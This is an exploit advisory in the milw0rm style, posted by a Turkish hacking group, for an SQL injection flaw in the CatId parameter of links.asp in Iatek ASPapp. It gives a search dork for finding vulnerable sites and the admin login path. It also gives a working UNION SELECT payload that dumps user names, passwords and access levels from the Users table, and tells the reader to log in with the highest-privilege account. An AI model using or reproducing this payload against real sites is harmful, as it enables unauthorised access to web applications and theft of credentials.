48 lines
No EOL
1.7 KiB
Text
48 lines
No EOL
1.7 KiB
Text
..##.....##
|
|
...##...##
|
|
....##.##
|
|
.....###CoRPITX
|
|
.....###
|
|
....##.##
|
|
...##...##
|
|
..##.....##
|
|
|
|
-----------------Turkey--------------------------------------
|
|
|
|
--------- www.Hayalet-hack.com-------------------------------
|
|
|
|
----------www.xcorpitx-hack.com------------------------------
|
|
Iatek | ASPapp -links.asp (CatId) SQL Injection Vulnerability
|
|
-------------------------------------------------
|
|
you ll see lots of users like this but accesslevel ll help you for see admin
|
|
-------------------------------------------------------------
|
|
----------------example--------------------------------------
|
|
|
|
Links › guest › 12 › 1 user
|
|
Links › editor › editor › 2 materator
|
|
Links › manager› manager› 2 materator
|
|
Links › surco › surco › 2 materator
|
|
Links › admin › admin › 3 admin
|
|
Links › ovivas › ovivas › 4 super-admin----- we ll login with this username
|
|
-------------------------------------------------------------
|
|
|
|
-------------------------------------------------------------
|
|
i mean.. when you see big number 4 or 5 you can use this username and password
|
|
-------------------------------------------------------------
|
|
|
|
-------
|
|
dork - ''links.asp?CatId''
|
|
-------
|
|
exploit-
|
|
-------
|
|
admin login-
|
|
-------
|
|
www.xxx.com/path/login.asp?ret_page=%2Fzmicer%2Fweb%2Fadmin%2Easp%3F
|
|
-------
|
|
-------------------------------------------------------------
|
|
links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,null,user_name,%205%20,password,null%20FROM%20Users
|
|
-------------------------------------------------------------
|
|
|
|
thanx- str0ke-D3ng3siz-pc faresi-s@bun-Hayalet-Turque-
|
|
|
|
# milw0rm.com [2008-03-19] |